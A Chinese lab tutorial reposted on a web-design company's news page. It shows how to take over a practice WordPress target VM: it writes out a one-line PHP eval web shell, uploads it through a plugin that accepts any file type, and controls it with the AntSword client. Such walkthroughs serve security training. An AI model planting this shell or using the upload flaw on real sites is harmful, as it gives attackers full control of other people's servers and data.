尧图网站建设 尧图网络
  • 首页
  • 关于我们
  • 服务项目
  • 案例展示
  • 建站流程
  • 资讯中心
  • 联系我们
首页/资讯中心/详情

利用一句话木马夺取目标网站的shell

利用一句话木马夺取目标网站的shell
📅 发布时间:2026/6/19 19:43:09

实验准备

目标网站:webdeveloper

工具:一句话木马(shell.php)、蚁剑

实验环境:物理机、虚拟机kali

一、在kali桌面创建一个shell.php文件,写入一句话木马,如图

<?php
@eval($_REQUEST["shell"]);
?>

二、将木马上传webdeveloper网站

利用插件上传不限制文件的漏洞,选择木马文件并上传,显示"not be installed"没关系,打开网页目录:http://192.168.194.134/wp-content/uploads/2025/12/

可以发现shell.php已经下载到网页的uploads目录里:

三、在物理机利用蚁剑连接目标网站

成功连接并控制目标网站,接下来可以随意查看文件,完成目标。

相关新闻

  • 基于单片机的家用数字电能表
  • Rk3588鲁班猫4点亮led
  • 掌握5个关键点,搞定语音识别测试!

最新新闻

  • 专业户内隔离手车公司推荐榜:2026年行业深度评测与选购指南在电力系统运行中,户内隔离手车作为中压开关柜的核心部件,直接影响设备检修安全与供电可靠性 - 资讯速览
  • 2026跨省寄大件行李哪个快递便宜?长途寄件省心攻略 - 快递物流资讯
  • 嵌入式GUI开发:emWin对话框机制与核心控件实战解析
  • 投资机器论
  • 上海旧房翻新多少钱一平米?2026年最新价格体系与透明报价品牌推荐 - 优家闲谈
  • 深度解析ComfyUI-Impact-Pack架构演进与Switch节点兼容性优化方案

日新闻

  • 信任的进化:技术实现详解——如何用JavaScript构建博弈论模拟器
  • Terrakube自定义工作流:如何集成OPA、Infracost等工具扩展IaC能力
  • grunt-concurrent快速入门:5分钟学会并行运行Grunt任务

周新闻

  • 3步解锁iOS设备:applera1n激活锁绕过完全指南
  • 39 2026 人工智能证书终极盘点,普通人选 AI 证书可以从这些方向入手
  • Redis 暴露公网有多危险?从端口检查到补救步骤

月新闻

  • 【总结】入门篇:50句话让你记住架构核心概念
  • WeChatMsg技术方案解析:实现Mac微信数据自主管理的完整解决方案
  • WeChatMsg:革新性微信数据备份方案,打造你的专属数字记忆库

关于尧图

  • 公司简介
  • 团队介绍
  • 企业文化
  • 荣誉资质

服务项目

  • 定制开发
  • 电商建站
  • UI 设计
  • 运维服务

快速链接

  • 案例展示
  • 建站流程
  • 常见问题
  • 资讯中心

联系方式

  • 📍北京市朝阳区互联网产业园 A 座 10 层
  • 📞400-888-8888
  • ✉️contact@rkmt.cn
  • 🕐周一至周日 9:00-21:00

© 2024 北京尧图网络科技有限公司 版权所有 | 京 ICP 备 XXXXXXXX 号